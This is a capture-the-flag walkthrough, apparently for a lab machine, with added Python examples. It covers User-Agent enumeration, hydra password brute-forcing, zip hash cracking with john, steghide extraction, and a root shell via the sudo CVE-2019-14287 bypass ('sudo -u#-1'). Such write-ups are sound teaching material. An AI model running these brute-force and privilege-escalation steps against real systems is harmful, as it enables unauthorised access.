which shows ftp on port 21, ssh on port 22, and a webserver on port 80.
Accessing the website shows an announcement from Agent R:

<!DocType html>
<html>
<head>
<title>Annoucement</title>
</head>
<body>
<p>
Dear agents,
<br><br>
Use your own <b>codename</b> as user-agent to access the site.
<br><br>
From,<br>
Agent R
</p>
</body>
</html>

So the User-Agent header has to carry an agent's codename to get in. Setting User-Agent: R via curl yields the following:

$ curl -A "R" 10.10.94.61
What are you doing! Are you one of the 25 employees? If not, I going to report this incident

R plus 25 other employees makes 26, which indicates that the letters of the alphabet are used as identifiers for the different agents. Iterating through the alphabet, one will find the name of the agent being asked for.
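The codename enumeration described above, as an added example that is not part of the original write-up: it sends every letter A to Z as the User-Agent and reports the ones whose response differs from the page served to an unknown user agent. The target URL is a parameter (the IP from this write-up is only the default), the baseline User-Agent string is an assumption, and the fetch function is injectable so the loop can be exercised offline.

```python
"""Added example (not part of the original write-up): try each letter A to Z
as the User-Agent and report which ones get a response different from the
one an unknown user agent gets.  The target URL comes from the command line;
the fetch function is a parameter so the loop can be tested offline."""
import string
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict

# Assumed baseline: a User-Agent value no agent would have.
BASELINE_UA = "not-an-agent"


def fetch_with_user_agent(url: str, user_agent: str, timeout: float = 5.0) -> str:
    """GET `url` with the given User-Agent and return the response body.
    Error responses (4xx/5xx) are returned as bodies too, because an
    'access denied' page is still a usable signal."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", errors="replace")


def enumerate_codenames(url: str, fetch: Callable[[str, str], str]) -> Dict[str, str]:
    """Return {letter: body} for every single-letter User-Agent whose
    response differs from the baseline response.  The sender of the
    announcement (R) shows up here as well, so the result still needs a
    human look; the letter whose page differs from both is the one asked for."""
    baseline = fetch(url, BASELINE_UA)
    hits: Dict[str, str] = {}
    for letter in string.ascii_uppercase:
        body = fetch(url, letter)
        if body != baseline:
            hits[letter] = body
    return hits


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://10.10.94.61/"
    for letter, body in enumerate_codenames(target, fetch_with_user_agent).items():
        print(f"--- User-Agent: {letter} ---")
        print(body.strip()[:300])
```

Comparing against a baseline rather than looking for a fixed string keeps the loop useful when the "wrong agent" page changes; redirects are followed by urllib, so a codename that redirects to its own page also shows up as a differing body.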
Hash cracking and brute-force

Anonymous FTP login was not possible, but the username for the FTP service can be guessed from the enumeration part (the codename found above), so only the password needs to be brute-forced. In this case hydra was used against the FTP service for that.

Ultimately this yields a password that can be used to log in to the FTP service and list the following files:

ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Oct 29 2019 .
drwxr-xr-x 2 0 0 4096 Oct 29 2019 ..
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png

To download all those files for local analysis, wget can mirror the whole FTP directory (the credentials end up in the shell history this way):

$ wget -m ftp://<username>:<password>@<ip>

Moving on with binwalk to find embedded files. cutie.png carries an encrypted zip archive, starting at offset 0x8702, that contains a file named To_agentR.txt:

$ binwalk cutie.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22

Extracting it with binwalk -e writes the archive to _cutie.png.extracted/8702.zip, named after the offset it was found at:

$ binwalk -e cutie.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22

The zip archive is password-protected, so zip2john is used to turn it into a hash that john can crack:

$ zip2john 8702.zip > john.txt

The file john.txt is then passed on to john with the rockyou wordlist, yielding the password:

$ john --wordlist=/usr/share/wordlists/rockyou.txt john.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<password> (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE (2024-02-10 18:27) 3.703g/s 91022p/s 91022c/s 91022C/s christal..280789
Use the "--show" option to display all of the cracked passwords reliably
Session completed

This allows us to unzip the archive and read To_agentR.txt. Its content is an encoded string; pasting it into https://gchq.github.io/CyberChef/ and using the Magic operation proposes a decoding that turns out to be the passphrase needed for extracting the embedded content in the other image file, cute-alien.jpg.

For this, steghide can be used. First we try to get information on embedded data (steghide asks for the passphrase here as well):

$ steghide info cute-alien.jpg
"cute-alien.jpg":
format: jpeg
capacity: 1,8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "message.txt":
size: 181,0 Byte
encrypted: rijndael-128, cbc
compressed: yes

It turns out that cute-alien.jpg contains a message.txt file. This is then extracted with the same passphrase:

$ steghide extract -sf cute-alien.jpg
Enter passphrase:
wrote extracted data to "message.txt".

From the content of message.txt, we can derive the full name of the other agent and the SSH password.

Capture the user flag

Upon logging in via SSH, a file user_flag.txt is found together with an image file, Alien_autopsy.jpg. Some googling (for instance a reverse image search of the picture) should get you the answer to the incident question.

Privilege escalation

The name of the CTF already hints at the attack vector. Nevertheless, it is always nice to see what can be executed with sudo to begin with:

<username>@agent-sudo:~$ sudo -l
[sudo] password for <username>:
Matching Defaults entries for <username> on agent-sudo:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User <username> may run the following commands on agent-sudo:
(ALL, !root) /bin/bash

So /bin/bash may be run as any user except root. If we then check what version of sudo is running on the machine:

$ sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

Sudo 1.8.21p2 is older than 1.8.28, so the security bypass published at https://www.exploit-db.com/exploits/47502 (CVE-2019-14287) applies: with a runas rule of the form (ALL, !root), asking for user id -1 (or 4294967295) passes the !root check because it is not 0, but setresuid() treats that value as "leave the uid unchanged", and sudo itself is already running as root. Running sudo -u#-1 /bin/bash therefore works perfectly fine to obtain a root shell and answer the remaining questions.
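The embedded-archive step above (binwalk spotting the encrypted To_agentR.txt zip inside cutie.png at 0x8702), as an added example that is not from the original write-up: a small Python carver that finds a ZIP appended to a PNG by its header signatures, reports the offset binwalk would print, and reads the central directory to show the entry name and the encryption flag that made zip2john necessary. The PNG and the one-entry archive are constructed inline (a note.txt entry with the encryption flag set but no real ZipCrypto applied), and all function names are the example's own.

```python
"""Added example (not from the write-up): carve a ZIP archive appended to a
PNG and describe its entries from the central directory.  The sample
image and archive are constructed in build_sample_png_with_zip()."""
import io
import struct
import sys
import zipfile
import zlib
from typing import List, Tuple

PK_LOCAL = b"PK\x03\x04"    # local file header
PK_CENTRAL = b"PK\x01\x02"  # central directory header
PK_END = b"PK\x05\x06"      # end of central directory (EOCD)


def find_zip_archives(data: bytes) -> List[Tuple[int, int]]:
    """Return (start, end) offsets of embedded ZIPs: each local-file-header
    signature is paired with the next EOCD record.  binwalk reports the
    same start offset (0x8702 in the write-up)."""
    found, pos = [], 0
    while True:
        start = data.find(PK_LOCAL, pos)
        if start < 0:
            break
        eocd = data.find(PK_END, start)
        if eocd < 0:
            break
        comment_len = struct.unpack_from("<H", data, eocd + 20)[0]  # EOCD is 22 bytes + comment
        end = eocd + 22 + comment_len
        found.append((start, end))
        pos = end
    return found


def describe_entries(blob: bytes) -> List[dict]:
    """Read the carved archive's central directory: name, sizes and the
    encryption flag (bit 0 of the general-purpose flags)."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return [{"name": i.filename, "compressed": i.compress_size,
                 "uncompressed": i.file_size, "encrypted": bool(i.flag_bits & 0x1)}
                for i in zf.infolist()]


def analyze(data: bytes) -> List[dict]:
    """Carve every candidate and describe it; a stray PK\\x03\\x04 inside
    image data is reported with no entries instead of aborting."""
    results = []
    for start, end in find_zip_archives(data):
        try:
            entries = describe_entries(data[start:end])
        except zipfile.BadZipFile:
            entries = []
        results.append({"offset": start, "hex": hex(start), "size": end - start, "entries": entries})
    return results


def build_stored_zip(name: bytes, payload: bytes, encrypted: bool) -> bytes:
    """Hand-build a one-entry ZIP (method 0 = stored).  With encrypted=True
    only the header flag is set; no ZipCrypto is applied, which is enough
    to show what the central directory reports (do not try to read it)."""
    flags = 0x1 if encrypted else 0x0
    crc = zlib.crc32(payload) & 0xFFFFFFFF
    local = PK_LOCAL + struct.pack("<HHHHHIIIHH", 20, flags, 0, 0, 0, crc,
                                   len(payload), len(payload), len(name), 0) + name
    central = PK_CENTRAL + struct.pack("<HHHHHHIIIHHHHHII", 20, 20, flags, 0, 0, 0, crc,
                                       len(payload), len(payload), len(name), 0, 0, 0, 0, 0, 0) + name
    eocd = PK_END + struct.pack("<HHHHIIH", 0, 0, 1, 1, len(central), len(local) + len(payload), 0)
    return local + payload + central + eocd


def build_sample_png_with_zip() -> bytes:
    """Constructed sample: a minimal 1x1 greyscale PNG followed by the zip."""
    def chunk(tag: bytes, body: bytes) -> bytes:
        return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", zlib.crc32(tag + body) & 0xFFFFFFFF)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    png = b"\x89PNG\r\n\x1a\n" + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")
    return png + build_stored_zip(b"note.txt", b"hello", encrypted=True)


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_png_with_zip()
    for hit in analyze(data):
        print(f"ZIP at {hit['hex']} ({hit['size']} bytes): {hit['entries']}")
```

Run it with a file argument to scan a real image; without one it scans the constructed sample. The signature pairing is deliberately simple (first local header to next EOCD), which is why a false positive inside compressed image data is handled rather than assumed away.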
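Why the (ALL, !root) rule above is bypassable, as an added model that is neither the write-up's nor sudo's own code: the uid arithmetic behind EDB 47502 / CVE-2019-14287 in Python. The parse step, the !root check and the setresuid() rule are simplified stand-ins for sudo's real logic, and the patched flag models the 1.8.28 fix that rejects -1 and 4294967295 as a runas uid.

```python
"""Added model (not the write-up's or sudo's code): why `sudo -u#-1 /bin/bash`
slips past "(ALL, !root) /bin/bash" on sudo < 1.8.28.  Only the uid
arithmetic is modelled; no privilege change is attempted."""
import ctypes
from typing import Optional

UID_T_MAX = 0xFFFFFFFF  # uid_t is an unsigned 32-bit integer on Linux


def runas_uid_from_spec(spec: str, patched: bool = False) -> int:
    """Model of how `-u#<n>` became a uid_t: parsed as a signed integer and
    stored in an unsigned 32-bit field, so -1 becomes 4294967295.  With
    patched=True the 1.8.28 behaviour is modelled: -1 and UID_T_MAX are
    rejected as invalid."""
    if not spec.startswith("#"):
        raise ValueError("expected a numeric runas spec such as '#-1'")
    n = int(spec[1:], 10)
    uid = ctypes.c_uint32(n).value
    if patched and (n == -1 or uid == UID_T_MAX):
        raise ValueError("invalid user id")
    return uid


def not_root_rule_allows(uid: int) -> bool:
    """The sudoers check for "(ALL, !root)": any uid except 0 is allowed."""
    return uid != 0


def resulting_euid(current_euid: int, requested_uid: int) -> int:
    """setresuid(2) semantics: a uid of (uid_t)-1 means "leave unchanged".
    sudo is setuid root, so its current euid is 0."""
    return current_euid if requested_uid == UID_T_MAX else requested_uid


def simulate(spec: str, patched: bool = False) -> dict:
    """Walk the three steps for one -u spec and report what shell uid results."""
    uid = runas_uid_from_spec(spec, patched=patched)
    allowed = not_root_rule_allows(uid)
    euid: Optional[int] = resulting_euid(0, uid) if allowed else None
    return {"uid": uid, "allowed": allowed, "euid": euid}


if __name__ == "__main__":
    for spec in ("#1000", "#0", "#-1", "#4294967295"):
        print(spec, simulate(spec))
```

The model reproduces the three facts the exploit rests on: the blacklist compares against the converted uid, the converted uid of -1 is not 0, and the kernel call that would drop privileges is a no-op for that value.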